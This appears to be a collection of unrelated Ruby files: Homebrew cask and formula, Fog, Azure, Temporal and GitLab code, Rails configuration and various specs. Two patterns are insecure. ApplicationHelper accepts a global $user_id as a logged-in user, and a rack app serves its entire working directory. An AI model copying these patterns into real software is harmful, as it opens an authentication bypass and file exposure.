cask 'grids' do
  version '5.4'
  sha256 'c4359aa61073c9e0f412b522ce030d631741365e8b96e195760067fdc43489bd'

  url "https://gridsapp.net/bin/Grids_#{version}.zip"
  appcast 'https://gridsapp.net/appcast.json'
  name 'Grids'
  homepage 'https://gridsapp.net/'

  auto_updates true
  depends_on macos: '>= :sierra'

  app 'Grids.app'

  uninstall quit: 'com.thinktimecreations.Grids'

  zap trash: [
    '~/Library/Application Support/ThinkTimeCreations/Grids',
    '~/Library/Preferences/com.thinktimecreations.Grids.plist',
  ]
end

module Fog
  module AWS
    class EFS
      class Real
        # Create a new, empty file system
        # http://docs.aws.amazon.com/efs/latest/ug/API_CreateFileSystem.html
        # ==== Parameters
        # * CreationToken <~String> - String of up to 64 ASCII characters. Amazon EFS uses this to ensure idempotent creation.
        # * PerformanceMode <~String> - (Optional) The PerformanceMode of the file system. We recommend generalPurpose performance mode for most file systems. File systems using the maxIO performance mode can scale to higher levels of aggregate throughput and operations per second with a tradeoff of slightly higher latencies for most file operations. This can't be changed after the file system has been created.
        # ==== Returns
        # * response<~Excon::Response>
        #   * body<~Hash>
        def create_file_system(creation_token, options={})
          request({
            :path => "file-systems",
            :method => 'POST',
            :expects => 201,
            'CreationToken' => creation_token,
            'PerformanceMode' => options[:performance_mode] || 'generalPurpose'
          })
        end
      end

      class Mock
        def create_file_system(creation_token, options={})
          response = Excon::Response.new
          id = "fs-#{Fog::Mock.random_letters(8)}"

          file_system = {
            "OwnerId" => Fog::AWS::Mock.owner_id,
            "CreationToken" => creation_token,
            "PerformanceMode" => options[:performance_mode] || "generalPurpose",
            "FileSystemId" => id,
            "CreationTime" => Time.now.to_i.to_f,
            "LifeCycleState" => "creating",
            "NumberOfMountTargets" => 0,
            "SizeInBytes" => {
              "Value" => 1024,
              "Timestamp" => Time.now.to_i.to_f
            }
          }

          self.data[:file_systems][id] = file_system
          response.body = file_system
          response.status = 201
          response
        end
      end
    end
  end
end
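
# Usage sketch (added for illustration; not part of the original file —
# credentials, region, and token are placeholders). The Real#create_file_system
# request above would typically be driven like this:
#
#   require 'fog/aws'
#
#   efs = Fog::AWS::EFS.new(
#     aws_access_key_id:     'KEY',
#     aws_secret_access_key: 'SECRET',
#     region:                'us-east-1'
#   )
#
#   response = efs.create_file_system('my-creation-token', performance_mode: 'maxIO')
#   response.body['FileSystemId'] # => e.g. "fs-abcdefgh"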

# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

module Azure::CostManagement::Mgmt::V2018_05_31
  module Models
    #
    # The group by expression to be used in the report.
    #
    class ReportConfigGrouping

      include MsRestAzure

      # @return [ReportConfigColumnType] Has type of the column to group.
      # Possible values include: 'Tag', 'Dimension'
      attr_accessor :column_type

      # @return [String] The name of the column to group.
      attr_accessor :name

      #
      # Mapper for ReportConfigGrouping class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'ReportConfigGrouping',
          type: {
            name: 'Composite',
            class_name: 'ReportConfigGrouping',
            model_properties: {
              column_type: {
                client_side_validation: true,
                required: true,
                serialized_name: 'columnType',
                type: {
                  name: 'String'
                }
              },
              name: {
                client_side_validation: true,
                required: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              }
            }
          }
        }
      end
    end
  end
end
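
# Construction sketch (added for illustration; not part of the generated
# file — the column values are made up). The attr_accessors above are plain
# Ruby attributes; the mapper tells the MsRest serializer to emit them under
# the wire names 'columnType' and 'name':
#
#   grouping = Azure::CostManagement::Mgmt::V2018_05_31::Models::ReportConfigGrouping.new
#   grouping.column_type = 'Dimension' # or 'Tag'
#   grouping.name = 'ResourceGroup'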

require 'spec_helper'
describe Fuzzily::Searchable do
  # Prepare ourselves a Trigram repository
  before do
    silence_warnings do
      Trigram = Class.new(ActiveRecord::Base)
    end
    Trigram.class_eval { include Fuzzily::Model }
  end

  before(:each) { prepare_trigrams_table }
  before(:each) { prepare_owners_table }

  subject do
    silence_warnings do
      Stuff = Class.new(ActiveRecord::Base)
    end
    def Stuff.name ; 'Stuff' ; end
    def Stuff.flag ; false ; end
    Stuff
  end

  describe '.fuzzily_searchable' do
    it 'is available to all of ActiveRecord' do
      subject.should respond_to(:fuzzily_searchable)
    end

    it 'adds a find_by_fuzzy_<field> method' do
      subject.fuzzily_searchable :name
      subject.should respond_to(:find_by_fuzzy_name)
    end

    it 'is idempotent' do
      subject.fuzzily_searchable :name
      subject.fuzzily_searchable :name
      subject.should respond_to(:find_by_fuzzy_name)
    end

    it 'creates the trigrams_for_<field> association' do
      subject.fuzzily_searchable :name
      subject.new.should respond_to(:trigrams_for_name)
    end
  end

  describe '(callbacks)' do
    before { subject.fuzzily_searchable :name }

    it 'generates trigram records on creation' do
      subject.create!(:name => 'Paris')
      subject.last.trigrams_for_name.should_not be_empty
    end

    it 'generates the correct trigrams' do
      record = subject.create!(:name => 'FOO')
      Trigram.first.trigram.should == '**f'
      Trigram.first.owner_id.should == record.id
      Trigram.first.owner_type.should == 'Stuff'
    end

    it 'updates all trigram records on save' do
      subject.create!(:name => 'Paris')
      subject.first.update_attribute :name, 'Rome'
      Trigram.all.map(&:trigram).should =~ %w(**r *ro rom ome me*)
    end

    it 'deletes all trigrams on destroy' do
      subject.create!(:name => 'Paris').destroy
      Trigram.all.should be_empty
    end
  end

  describe '#update_fuzzy_<field>!' do
    before do
      subject.fuzzily_searchable :name
    end

    it 're-creates trigrams' do
      subject.create!(:name => 'Paris')
      old_ids = Trigram.all.map(&:id)
      subject.last.update_fuzzy_name!
      (old_ids & Trigram.all.map(&:id)).should be_empty
    end

    it 'ignores nil values' do
      subject.create!(:name => nil)
      subject.last.update_fuzzy_name!
      Trigram.all.should be_empty
    end

    if ActiveRecord::VERSION::MAJOR <= 3
      let(:fields) {[ :score, :fuzzy_field, :trigram ]}
      before { Trigram.attr_protected fields }

      it 'tolerates mass assignment security' do
        subject.create!(:name => 'Paris')
        subject.last.update_fuzzy_name!
      end
    end
  end

  describe '.bulk_update_fuzzy_<field>' do
    before { subject.fuzzily_searchable :name }

    it 'creates all trigrams' do
      subject.create!(:name => 'Paris')
      Trigram.delete_all
      subject.bulk_update_fuzzy_name
      Trigram.all.should_not be_empty
    end

    it 'ignores nil values' do
      subject.create!(:name => nil)
      Trigram.delete_all
      subject.bulk_update_fuzzy_name
      Trigram.all.should be_empty
    end
  end

  context '(integration test)' do
    describe '#find_by_fuzzy_<field>' do
      it 'returns records' do
        subject.fuzzily_searchable :name
        @paris = subject.create!(:name => 'Paris')
        @palma = subject.create!(:name => 'Palma de Majorca')
        @palmyre = subject.create!(:name => 'La Palmyre')

        subject.find_by_fuzzy_name('Piris').should_not be_empty
        subject.find_by_fuzzy_name('Piris').should =~ [@paris, @palma]
        subject.find_by_fuzzy_name('Paradise').should =~ [@paris, @palma, @palmyre]
      end

      it 'favours exact matches' do
        subject.fuzzily_searchable :name
        @new_york = subject.create!(:name => 'New York')
        @yorkshire = subject.create!(:name => 'Yorkshire')
        @york = subject.create!(:name => 'York')
        @yorkisthan = subject.create!(:name => 'Yorkisthan')

        subject.find_by_fuzzy_name('York').should == [@york, @new_york, @yorkshire, @yorkisthan]
        subject.find_by_fuzzy_name('Yorkshire').should == [@yorkshire, @york, @yorkisthan, @new_york]
      end

      it 'does not favour short words' do
        subject.fuzzily_searchable :name
        @lo = subject.create!(:name => 'Lo')         # **l *lo lo*
        @london = subject.create!(:name => 'London') # **l *lo lon ond ndo don on*
        # **l *lo lon
        subject.find_by_fuzzy_name('Lon').should == [@london, @lo]
      end

      it 'honours limit option' do
        subject.fuzzily_searchable :name
        3.times { subject.create!(:name => 'Paris') }
        subject.find_by_fuzzy_name('Paris', :limit => 2).length.should == 2
      end

      it 'honours offset option' do
        subject.fuzzily_searchable :name
        3.times { subject.create!(:name => 'Paris') }
        subject.find_by_fuzzy_name('Paris', :offset => 2).length.should == 1
      end

      it 'doesnt die on scopes' do
        subject.fuzzily_searchable :name
        @new_york = subject.create!(:name => 'New York', :flag => true)
        @yorkshire = subject.create!(:name => 'Yorkshire', :flag => false)
        expect {
          subject.where(:flag => true).find_by_fuzzy_name('York')
        }.to_not raise_error
      end

      it 'doesnt return nils' do
        subject.fuzzily_searchable :name
        @new_york = subject.create!(:name => 'New York', :flag => true)
        results = subject.where(:flag => false).find_by_fuzzy_name('York')
        results.any?{ |r| r == nil }.should be_false
      end
    end
  end
end
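
# Usage sketch distilled from the expectations above (added for illustration;
# the model is hypothetical):
#
#   class Stuff < ActiveRecord::Base
#     fuzzily_searchable :name
#   end
#
#   Stuff.find_by_fuzzy_name('Piris', :limit => 10) # => best-matching records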

# Protoc wants all of its generated files on the LOAD_PATH
$LOAD_PATH << File.expand_path('./gen', __dir__)

require 'securerandom'

require 'temporal/configuration'
require 'temporal/execution_options'
require 'temporal/client'
require 'temporal/activity'
require 'temporal/activity/async_token'
require 'temporal/workflow'
require 'temporal/workflow/history'
require 'temporal/workflow/execution_info'
require 'temporal/metrics'

module Temporal
  class << self
    def start_workflow(workflow, *input, **args)
      options = args.delete(:options) || {}
      input << args unless args.empty?

      execution_options = ExecutionOptions.new(workflow, options)
      workflow_id = options[:workflow_id] || SecureRandom.uuid

      response = client.start_workflow_execution(
        namespace: execution_options.namespace,
        workflow_id: workflow_id,
        workflow_name: execution_options.name,
        task_queue: execution_options.task_queue,
        input: input,
        execution_timeout: execution_options.timeouts[:execution],
        task_timeout: execution_options.timeouts[:task],
        workflow_id_reuse_policy: options[:workflow_id_reuse_policy],
        headers: execution_options.headers
      )

      response.run_id
    end

    def schedule_workflow(workflow, cron_schedule, *input, **args)
      options = args.delete(:options) || {}
      input << args unless args.empty?

      execution_options = ExecutionOptions.new(workflow, options)
      workflow_id = options[:workflow_id] || SecureRandom.uuid

      response = client.start_workflow_execution(
        namespace: execution_options.namespace,
        workflow_id: workflow_id,
        workflow_name: execution_options.name,
        task_queue: execution_options.task_queue,
        input: input,
        execution_timeout: execution_options.timeouts[:execution],
        task_timeout: execution_options.timeouts[:task],
        workflow_id_reuse_policy: options[:workflow_id_reuse_policy],
        headers: execution_options.headers,
        cron_schedule: cron_schedule
      )

      response.run_id
    end

    def register_namespace(name, description = nil)
      client.register_namespace(name: name, description: description)
    end

    def signal_workflow(workflow, signal, workflow_id, run_id, input = nil)
      execution_options = ExecutionOptions.new(workflow)

      client.signal_workflow_execution(
        namespace: execution_options.namespace, # TODO: allow passing namespace instead
        workflow_id: workflow_id,
        run_id: run_id,
        signal: signal,
        input: input
      )
    end

    def reset_workflow(namespace, workflow_id, run_id, workflow_task_id: nil, reason: 'manual reset')
      workflow_task_id ||= get_last_completed_workflow_task_id(namespace, workflow_id, run_id)
      raise Error, 'Could not find a completed workflow task event' unless workflow_task_id

      response = client.reset_workflow_execution(
        namespace: namespace,
        workflow_id: workflow_id,
        run_id: run_id,
        reason: reason,
        workflow_task_event_id: workflow_task_id
      )

      response.run_id
    end

    def terminate_workflow(workflow_id, namespace: nil, run_id: nil, reason: nil, details: nil)
      namespace ||= Temporal.configuration.namespace

      client.terminate_workflow_execution(
        namespace: namespace,
        workflow_id: workflow_id,
        run_id: run_id,
        reason: reason,
        details: details
      )
    end

    def fetch_workflow_execution_info(namespace, workflow_id, run_id)
      response = client.describe_workflow_execution(
        namespace: namespace,
        workflow_id: workflow_id,
        run_id: run_id
      )

      Workflow::ExecutionInfo.generate_from(response.workflow_execution_info)
    end

    def complete_activity(async_token, result = nil)
      details = Activity::AsyncToken.decode(async_token)

      client.respond_activity_task_completed_by_id(
        namespace: details.namespace,
        activity_id: details.activity_id,
        workflow_id: details.workflow_id,
        run_id: details.run_id,
        result: result
      )
    end

    def fail_activity(async_token, exception)
      details = Activity::AsyncToken.decode(async_token)

      client.respond_activity_task_failed_by_id(
        namespace: details.namespace,
        activity_id: details.activity_id,
        workflow_id: details.workflow_id,
        run_id: details.run_id,
        exception: exception
      )
    end

    def configure(&block)
      yield configuration
    end

    def configuration
      @configuration ||= Configuration.new
    end

    def logger
      configuration.logger
    end

    def metrics
      @metrics ||= Metrics.new(configuration.metrics_adapter)
    end

    private

    def client
      @client ||= Temporal::Client.generate
    end

    def get_last_completed_workflow_task_id(namespace, workflow_id, run_id)
      history_response = client.get_workflow_execution_history(
        namespace: namespace,
        workflow_id: workflow_id,
        run_id: run_id
      )
      history = Workflow::History.new(history_response.history.events)
      workflow_task_event = history.get_last_completed_workflow_task
      workflow_task_event&.id
    end
  end
end
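
# Client-side sketch (added for illustration; not from this file — the
# workflow class, its argument, and the configuration fields shown are
# assumptions):
#
#   Temporal.configure do |config|
#     config.host = 'localhost' # assumed configuration attribute
#   end
#
#   run_id = Temporal.start_workflow(HelloWorldWorkflow, 'alice', options: { workflow_id: 'hello-1' })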

class CreateWebHooks < ActiveRecord::Migration
  def self.up
    create_table :web_hooks do |table|
      table.string :gem_name
      table.integer :user_id
      table.string :url
      table.integer :failure_count, default: 0
      table.timestamps
    end
  end

  def self.down
    drop_table :web_hooks
  end
end

Rails.application.configure do
  # Settings specified here will take precedence over those in config/application.rb.

  # Code is not reloaded between requests.
  config.cache_classes = true

  # Eager load code on boot. This eager loads most of Rails and
  # your application in memory, allowing both threaded web servers
  # and those relying on copy on write to perform better.
  # Rake tasks automatically ignore this option for performance.
  config.eager_load = true

  # Full error reports are disabled and caching is turned on.
  config.consider_all_requests_local = false
  config.action_controller.perform_caching = true

  # Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
  # or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
  # config.require_master_key = true

  # Disable serving static files from the `/public` folder by default since
  # Apache or NGINX already handles this.
  config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?

  # Compress CSS using a preprocessor.
  # config.assets.css_compressor = :sass

  # Do not fallback to assets pipeline if a precompiled asset is missed.
  config.assets.compile = false

  # Enable serving of images, stylesheets, and JavaScripts from an asset server.
  # config.action_controller.asset_host = 'http://assets.example.com'

  # Specifies the header that your server uses for sending files.
  # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
  # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX

  # Store uploaded files on the local file system (see config/storage.yml for options).
  config.active_storage.service = :local

  # Mount Action Cable outside main process or domain.
  # config.action_cable.mount_path = nil
  # config.action_cable.url = 'wss://example.com/cable'
  # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]

  # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
  # config.force_ssl = true

  # Use the lowest log level to ensure availability of diagnostic information
  # when problems arise.
  config.log_level = :debug

  # Prepend all log lines with the following tags.
  config.log_tags = [ :request_id ]

  # Use a different cache store in production.
  # config.cache_store = :mem_cache_store

  # Use a real queuing backend for Active Job (and separate queues per environment).
  # config.active_job.queue_adapter = :resque
  # config.active_job.queue_name_prefix = "App_production"

  config.action_mailer.perform_caching = false

  # Ignore bad email addresses and do not raise email delivery errors.
  # Set this to true and configure the email server for immediate delivery to raise delivery errors.
  # config.action_mailer.raise_delivery_errors = false

  # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
  # the I18n.default_locale when a translation cannot be found).
  config.i18n.fallbacks = true

  # Send deprecation notices to registered listeners.
  config.active_support.deprecation = :notify

  # Use default logging formatter so that PID and timestamp are not suppressed.
  config.log_formatter = ::Logger::Formatter.new

  config.serve_static_assets = false

  # Use a different logger for distributed setups.
  # require 'syslog/logger'
  # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')

  if ENV["RAILS_LOG_TO_STDOUT"].present?
    logger = ActiveSupport::Logger.new(STDOUT)
    logger.formatter = config.log_formatter
    config.logger = ActiveSupport::TaggedLogging.new(logger)
  end

  # Do not dump schema after migrations.
  config.active_record.dump_schema_after_migration = false

  # Inserts middleware to perform automatic connection switching.
  # The `database_selector` hash is used to pass options to the DatabaseSelector
  # middleware. The `delay` is used to determine how long to wait after a write
  # to send a subsequent read to the primary.
  #
  # The `database_resolver` class is used by the middleware to determine which
  # database is appropriate to use based on the time delay.
  #
  # The `database_resolver_context` class is used by the middleware to set
  # timestamps for the last write to the primary. The resolver uses the context
  # class timestamps to determine how long to wait before reading from the
  # replica.
  #
  # By default Rails will store a last write timestamp in the session. The
  # DatabaseSelector middleware is designed as such you can define your own
  # strategy for connection switching and pass that into the middleware through
  # these configuration options.
  # config.active_record.database_selector = { delay: 2.seconds }
  # config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
  # config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end

module ApplicationHelper
  # $user_id is for testing
  def logged_in?
    return session[:user_id].present? || $user_id.present?
  end

  def current_user
    if logged_in?
      return @current_user ||= User.find(session[:user_id] || $user_id)
    else
      return nil
    end
  end
end

require 'coveralls'
Coveralls.wear!('rails')

ENV["RAILS_ENV"] ||= 'test'

require File.expand_path("../../config/environment", __FILE__)
require 'rspec/rails'
require 'rspec/autorun'
require 'sidekiq/testing'

include ActionDispatch::TestProcess

# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[Rails.root.join("spec/support/**/*.rb")].each { |f| require f }

# Checks for pending migrations before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.check_pending! if defined?(ActiveRecord::Migration)

RSpec.configure do |config|
  # Avoid warnings about locale when running specs
  I18n.enforce_available_locales = false

  config.mock_with :mocha
  config.include FactoryGirl::Syntax::Methods

  # Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
  config.fixture_path = "#{::Rails.root}/spec/fixtures"

  # If you're not using ActiveRecord, or you'd prefer not to run each of your
  # examples within a transaction, remove the following line or assign false
  # instead of true.
  config.use_transactional_fixtures = true

  # If true, the base class of anonymous controllers will be inferred
  # automatically. This will be the default behavior in future versions of
  # rspec-rails.
  config.infer_base_class_for_anonymous_controllers = false

  # Run specs in random order to surface order dependencies. If you find an
  # order dependency and want to debug it, you can fix the order by providing
  # the seed, which is printed after each run.
  #     --seed 1234
  config.order = 'random'

  # In RSpec 3, symbols passed as metadata arguments to configuration options
  # will be treated as metadata keys with a value of `true`. To get this
  # behavior now (and prevent a warning), we can set this configuration option.
  config.treat_symbols_as_metadata_keys_with_true_values = true

  config.before(:each) do
    Phantomjs.stubs(:run).yields '{"title": "A title"}' # Don't run PhantomJS
    Sidekiq::Testing.inline! # Run async worker jobs synchronous
  end

  # Tag "uses_after_commit" helps when after_commit hook is expected
  # to fire in a spec. It would never fire because of having enabled
  # use_transactional_fixtures. It waits for transaction to end. The
  # workaround disables transaction-wrapping for the tagged spec and
  # instead uses a DatabaseCleaner strategy to wipe the tables here.
  config.around(:each, :uses_after_commit) do |example|
    _orig_use_transactional_fixtures = use_transactional_fixtures
    self.use_transactional_fixtures = false
    DatabaseCleaner.clean_with(:truncation)
    example.call
    DatabaseCleaner.clean_with(:truncation)
    self.use_transactional_fixtures = _orig_use_transactional_fixtures
  end
end
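
# Usage sketch for the :uses_after_commit tag wired up above (added for
# illustration; the spec body is hypothetical):
#
#   it 'fires after_commit callbacks', :uses_after_commit do
#     record = FactoryGirl.create(:record) # hypothetical factory
#     # ...assert on side effects that only happen after commit...
#   end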

require 'spec_helper'
module JayaMegaLotto
  describe Configuration do
    let(:config) { Configuration.new }

    it "default value is 6" do
      expect(config.drawing_count).to eq(6)
      # Configuration.new.drawing_count = 6
    end
  end

  describe "#drawing_count=" do
    let(:config) { Configuration.new }

    it "can set value" do
      config.drawing_count = 7
      expect(config.drawing_count).to eq(7)
    end
  end
end

#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++

require_relative '../filters'

module Components
  module WorkPackages
    module TableConfiguration
      class Filters < ::Components::WorkPackages::Filters
        attr_reader :modal

        def initialize
          @modal = ::Components::WorkPackages::TableConfigurationModal.new
        end

        def open
          modal.open_and_switch_to 'Filters'
          expect_open
        end

        def save
          modal.save
        end

        def expect_filter_count(count)
          within(modal.selector) do
            expect(page).to have_selector('.advanced-filters--filter', count: count)
          end
        end

        def expect_open
          modal.expect_open
          expect(page).to have_selector('.tab-show.selected', text: 'Filters')
        end

        def expect_closed
          modal.expect_closed
        end
      end
    end
  end
end
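
# Spec-side sketch (added for illustration; not from this file). The page
# object above is meant to be driven from a feature spec roughly like so:
#
#   filters = Components::WorkPackages::TableConfiguration::Filters.new
#   filters.open
#   filters.expect_filter_count(2)
#   filters.save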

# frozen_string_literal: true
require 'spec_helper'
require Rails.root.join('db', 'post_migrate', '20200615111857_unconfirm_wrongfully_verified_emails.rb')

RSpec.describe UnconfirmWrongfullyVerifiedEmails do
  before do
    user = table(:users).create!(name: 'user1', email: '[email protected]', projects_limit: 1)
    table(:emails).create!(email: '[email protected]', user_id: user.id)
  end

  it 'enqueues WrongfullyConfirmedEmailUnconfirmer job' do
    Sidekiq::Testing.fake! do
      migrate!

      jobs = BackgroundMigrationWorker.jobs
      expect(jobs.size).to eq(1)
      expect(jobs.first["args"].first).to eq(Gitlab::BackgroundMigration::WrongfullyConfirmedEmailUnconfirmer.name.demodulize)
    end
  end
end

require 'socky/server'
require 'redom'

require './chat/chat'
require './othello/othello'

class RedomApp < Rack::WebSocket::Application
  def on_open(env)
    Redom.on_open self
  end

  def on_message(env, msg)
    Redom.on_message self, msg
  end

  def on_close(env)
    Redom.on_close self
  end

  def send(msg)
    send_data msg
  end
end

Redom.start

map '/websocket' do
  run RedomApp.new
end

map '/redom.js' do
  run Proc.new {|env| [200, {"Content-Type" => "text/javascript"}, [Redom.runtime]]}
end

run Rack::Directory.new(File.expand_path('.'))

# frozen_string_literal: true
class DiffFileBaseEntity < Grape::Entity
  include RequestAwareEntity
  include BlobHelper
  include DiffHelper
  include TreeHelper
  include ChecksCollaboration
  include Gitlab::Utils::StrongMemoize

  expose :content_sha
  expose :submodule?, as: :submodule

  expose :submodule_link do |diff_file, options|
    memoized_submodule_links(diff_file, options).first
  end

  expose :submodule_tree_url do |diff_file|
    memoized_submodule_links(diff_file, options).last
  end

  expose :edit_path, if: -> (_, options) { options[:merge_request] } do |diff_file|
    merge_request = options[:merge_request]

    next unless merge_request.merged? || merge_request.source_branch_exists?

    target_project, target_branch = edit_project_branch_options(merge_request)

    if Feature.enabled?(:web_ide_default)
      ide_edit_path(target_project, target_branch, diff_file.new_path)
    else
      options = merge_request.persisted? && merge_request.source_branch_exists? && !merge_request.merged? ? { from_merge_request_iid: merge_request.iid } : {}

      project_edit_blob_path(target_project, tree_join(target_branch, diff_file.new_path), options)
    end
  end

  expose :old_path_html do |diff_file|
    old_path, _ = mark_inline_diffs(diff_file.old_path, diff_file.new_path)
    old_path
  end

  expose :new_path_html do |diff_file|
    _, new_path = mark_inline_diffs(diff_file.old_path, diff_file.new_path)
    new_path
  end

  expose :formatted_external_url, if: -> (_, options) { options[:environment] } do |diff_file|
    options[:environment].formatted_external_url
  end

  expose :external_url, if: -> (_, options) { options[:environment] } do |diff_file|
    options[:environment].external_url_for(diff_file.new_path, diff_file.content_sha)
  end

  expose :blob, using: BlobEntity

  expose :can_modify_blob do |diff_file|
    merge_request = options[:merge_request]

    next unless diff_file.blob

    if merge_request&.source_project && current_user
      can_modify_blob?(diff_file.blob, merge_request.source_project, merge_request.source_branch_exists? ? merge_request.source_branch : merge_request.target_branch)
    else
      false
    end
  end

  expose :file_identifier_hash
  expose :file_hash
  expose :file_path
  expose :old_path
  expose :new_path
  expose :new_file?, as: :new_file
  expose :renamed_file?, as: :renamed_file
  expose :deleted_file?, as: :deleted_file

  expose :diff_refs

  expose :stored_externally?, as: :stored_externally
  expose :external_storage

  expose :mode_changed?, as: :mode_changed
  expose :a_mode
  expose :b_mode

  expose :viewer, using: DiffViewerEntity
  expose :alternate_viewer, using: DiffViewerEntity

  expose :old_size do |diff_file|
    diff_file.old_blob&.raw_size
  end

  expose :new_size do |diff_file|
    diff_file.new_blob&.raw_size
  end

  private

  def memoized_submodule_links(diff_file, options)
    strong_memoize(:submodule_links) do
      if diff_file.submodule?
        options[:submodule_links].for(diff_file.blob, diff_file.content_sha)
      else
        []
      end
    end
  end

  def current_user
    request.current_user
  end

  def edit_project_branch_options(merge_request)
    if merge_request.source_branch_exists? && !merge_request.merged?
      [merge_request.source_project, merge_request.source_branch]
    else
      [merge_request.target_project, merge_request.target_branch]
    end
  end
end
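
# Representation sketch (added for illustration; not from this file — the
# local variables are assumed to exist in the caller). As a Grape::Entity
# subclass, the entity is normally rendered via represent, with the option
# keys this class reads:
#
#   DiffFileBaseEntity.represent(
#     diff_file,
#     request: request,               # required by RequestAwareEntity
#     merge_request: merge_request,
#     submodule_links: submodule_links
#   ).as_json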

# frozen_string_literal: true
# Copyright 2015 Australian National Botanic Gardens
#
# This file is part of the NSL Editor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "test_helper"

# Single Name typeahead test.
class NameTAForUCSuggsShldNotInclNamesWOInstancesTest < ActiveSupport::TestCase
  test "name for unpub cit sugg should include names without instances" do
    suggestions = Name::AsTypeahead::ForUnpubCit
                  .new(term: "a name without instances")
                  .suggestions
    assert(suggestions.is_a?(Array), "suggestions should be an array")
    assert(!suggestions.empty?,
           'suggestions for "a name without instances" should not be empty')
  end
end

class Grafana < Formula
desc "Gorgeous metric visualizations and dashboards for timeseries databases"
homepage "https://grafana.com"
url "https://github.com/grafana/grafana/archive/v6.2.5.tar.gz"
sha256 "d91b9ef38bfa5a04ff6cd3502647f85057266c3fdef69cf56b67e323b6c0c284"
head "https://github.com/grafana/grafana.git"
bottle do
cellar :any_skip_relocation
sha256 "ea225d760a3f7b8bf647305cb8723b7d996d9549c7d85133488b398c0d9c6a15" => :mojave
sha256 "2fa4f819eb935821e155daf419b1f545452fe1a9ec0d7236f3a54d8247387a21" => :high_sierra
sha256 "9978e4d8af35d2e18d7059041e12fd2a09d3c4098e2c843415982c1e7178e9c6" => :sierra
end
depends_on "go" => :build
depends_on "node@10" => :build
depends_on "yarn" => :build
def install
ENV["GOPATH"] = buildpath
grafana_path = buildpath/"src/github.com/grafana/grafana"
grafana_path.install buildpath.children
cd grafana_path do
system "go", "run", "build.go", "build"
system "yarn", "install", "--ignore-engines"
system "node_modules/grunt-cli/bin/grunt", "build"
bin.install "bin/darwin-amd64/grafana-cli"
bin.install "bin/darwin-amd64/grafana-server"
(etc/"grafana").mkpath
cp("conf/sample.ini", "conf/grafana.ini.example")
etc.install "conf/sample.ini" => "grafana/grafana.ini"
etc.install "conf/grafana.ini.example" => "grafana/grafana.ini.example"
pkgshare.install "conf", "public", "tools", "vendor"
prefix.install_metafiles
end
end
def post_install
(var/"log/grafana").mkpath
(var/"lib/grafana/plugins").mkpath
end
plist_options :manual => "grafana-server --config=#{HOMEBREW_PREFIX}/etc/grafana/grafana.ini --homepath #{HOMEBREW_PREFIX}/share/grafana --packaging=brew cfg:default.paths.logs=#{HOMEBREW_PREFIX}/var/log/grafana cfg:default.paths.data=#{HOMEBREW_PREFIX}/var/lib/grafana cfg:default.paths.plugins=#{HOMEBREW_PREFIX}/var/lib/grafana/plugins"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key>
<false/>
</dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/grafana-server</string>
<string>--config</string>
<string>#{etc}/grafana/grafana.ini</string>
<string>--homepath</string>
<string>#{opt_pkgshare}</string>
<string>--packaging=brew</string>
<string>cfg:default.paths.logs=#{var}/log/grafana</string>
<string>cfg:default.paths.data=#{var}/lib/grafana</string>
<string>cfg:default.paths.plugins=#{var}/lib/grafana/plugins</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}/lib/grafana</string>
<key>StandardErrorPath</key>
<string>#{var}/log/grafana/grafana-stderr.log</string>
<key>StandardOutPath</key>
<string>#{var}/log/grafana/grafana-stdout.log</string>
<key>SoftResourceLimits</key>
<dict>
<key>NumberOfFiles</key>
<integer>10240</integer>
</dict>
</dict>
</plist>
EOS
end
test do
require "pty"
require "timeout"
# first test
system bin/"grafana-server", "-v"
# avoid stepping on anything that may be present in this directory
tdir = File.join(Dir.pwd, "grafana-test")
Dir.mkdir(tdir)
logdir = File.join(tdir, "log")
